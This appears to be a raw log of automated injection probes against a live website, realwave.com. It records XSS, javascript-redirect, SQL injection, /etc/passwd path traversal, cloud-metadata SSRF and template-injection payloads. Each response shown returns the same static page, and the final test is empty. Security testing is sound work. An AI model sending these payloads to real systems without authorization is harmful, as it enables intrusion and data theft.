=== PHASE 1: URL PARAMETER INJECTION ===
--- Test: q_xss ---
URL: https://www.realwave.com/?q=<script>alert(1)</script>
HTTP Code: 200
Response Headers:
HTTP/2 200
content-length: 63342
content-type: text/html
last-modified: Thu, 05 Feb 2026 22:26:03 GMT
accept-ranges: bytes
etag: "1dc96ee6976f8ee"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:44:59 GMT
Response Body (first 500 chars):
<!DOCTYPE html>
<html lang="en" data-critters-container>
<head>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-70DG95YYYQ"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() { dataLayer.push(arguments); }
gtag('js', new Date());
gtag('config', 'G-70DG95YYYQ');
</script>
<meta charset="utf-8">
<title>RealWave AI</title>
<base href="/">
<meta name="viewport" content="width
=========================================
--- Test: redirect_js ---
URL: https://www.realwave.com/?redirect=javascript:alert(1)
HTTP Code: 200
Response Headers:
HTTP/2 200
content-length: 63342
content-type: text/html
last-modified: Thu, 05 Feb 2026 22:26:03 GMT
accept-ranges: bytes
etag: "1dc96ee6976f8ee"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:44:59 GMT
Response Body (first 500 chars):
<!DOCTYPE html>
<html lang="en" data-critters-container>
<head>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-70DG95YYYQ"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() { dataLayer.push(arguments); }
gtag('js', new Date());
gtag('config', 'G-70DG95YYYQ');
</script>
<meta charset="utf-8">
<title>RealWave AI</title>
<base href="/">
<meta name="viewport" content="width
=========================================
--- Test: callback_img ---
URL: https://www.realwave.com/?callback=<img+src=x+onerror=alert(1)>
HTTP Code: 200
Response Headers:
HTTP/2 200
content-length: 63342
content-type: text/html
last-modified: Thu, 05 Feb 2026 22:26:03 GMT
accept-ranges: bytes
etag: "1dc96ee6976f8ee"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:00 GMT
Response Body (first 500 chars):
<!DOCTYPE html>
<html lang="en" data-critters-container>
<head>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-70DG95YYYQ"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() { dataLayer.push(arguments); }
gtag('js', new Date());
gtag('config', 'G-70DG95YYYQ');
</script>
<meta charset="utf-8">
<title>RealWave AI</title>
<base href="/">
<meta name="viewport" content="width
=========================================
--- Test: search_svg ---
URL: https://www.realwave.com/?search=<svg/onload=alert(1)>
HTTP Code: 200
Response Headers:
HTTP/2 200
content-length: 63342
content-type: text/html
last-modified: Thu, 05 Feb 2026 22:26:03 GMT
accept-ranges: bytes
etag: "1dc96ee6976f8ee"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:02 GMT
Response Body (first 500 chars):
<!DOCTYPE html>
<html lang="en" data-critters-container>
<head>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-70DG95YYYQ"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() { dataLayer.push(arguments); }
gtag('js', new Date());
gtag('config', 'G-70DG95YYYQ');
</script>
<meta charset="utf-8">
<title>RealWave AI</title>
<base href="/">
<meta name="viewport" content="width
=========================================
--- Test: id_sqli ---
URL: https://www.realwave.com/?id=1%27%20OR%201=1--
HTTP Code: 200
Response Headers:
HTTP/2 200
content-length: 63342
content-type: text/html
last-modified: Thu, 05 Feb 2026 22:26:03 GMT
accept-ranges: bytes
etag: "1dc96ee6976f8ee"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:03 GMT
Response Body (first 500 chars):
<!DOCTYPE html>
<html lang="en" data-critters-container>
<head>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-70DG95YYYQ"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() { dataLayer.push(arguments); }
gtag('js', new Date());
gtag('config', 'G-70DG95YYYQ');
</script>
<meta charset="utf-8">
<title>RealWave AI</title>
<base href="/">
<meta name="viewport" content="width
=========================================
--- Test: page_lfi ---
URL: https://www.realwave.com/?page=../../../../etc/passwd
HTTP Code: 200
Response Headers:
HTTP/2 200
content-length: 63342
content-type: text/html
last-modified: Thu, 05 Feb 2026 22:26:03 GMT
accept-ranges: bytes
etag: "1dc96ee6976f8ee"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:03 GMT
Response Body (first 500 chars):
<!DOCTYPE html>
<html lang="en" data-critters-container>
<head>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-70DG95YYYQ"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() { dataLayer.push(arguments); }
gtag('js', new Date());
gtag('config', 'G-70DG95YYYQ');
</script>
<meta charset="utf-8">
<title>RealWave AI</title>
<base href="/">
<meta name="viewport" content="width
=========================================
--- Test: url_ssrf ---
URL: https://www.realwave.com/?url=http://169.254.169.254/latest/meta-data/
HTTP Code: 200
Response Headers:
HTTP/2 200
content-length: 63342
content-type: text/html
last-modified: Thu, 05 Feb 2026 22:26:03 GMT
accept-ranges: bytes
etag: "1dc96ee6976f8ee"
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
date: Sat, 07 Feb 2026 05:45:04 GMT
Response Body (first 500 chars):
<!DOCTYPE html>
<html lang="en" data-critters-container>
<head>
<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-70DG95YYYQ"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag() { dataLayer.push(arguments); }
gtag('js', new Date());
gtag('config', 'G-70DG95YYYQ');
</script>
<meta charset="utf-8">
<title>RealWave AI</title>
<base href="/">
<meta name="viewport" content="width
=========================================
--- Test: template_ssti ---
URL: https://www.realwave.com/?template={{7*7}}
HTTP Code:
Response Headers:
Response Body (first 500 chars):
=========================================